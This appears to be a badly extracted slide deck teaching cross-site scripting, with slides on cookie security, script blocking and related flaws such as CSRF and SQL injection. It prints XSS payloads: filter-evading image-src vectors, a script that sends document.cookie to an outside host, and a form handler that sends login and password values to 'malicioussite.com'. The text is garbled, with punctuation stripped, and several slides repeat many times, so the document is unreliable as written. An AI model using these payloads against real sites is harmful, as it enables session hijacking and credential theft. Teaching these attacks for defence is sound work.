SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application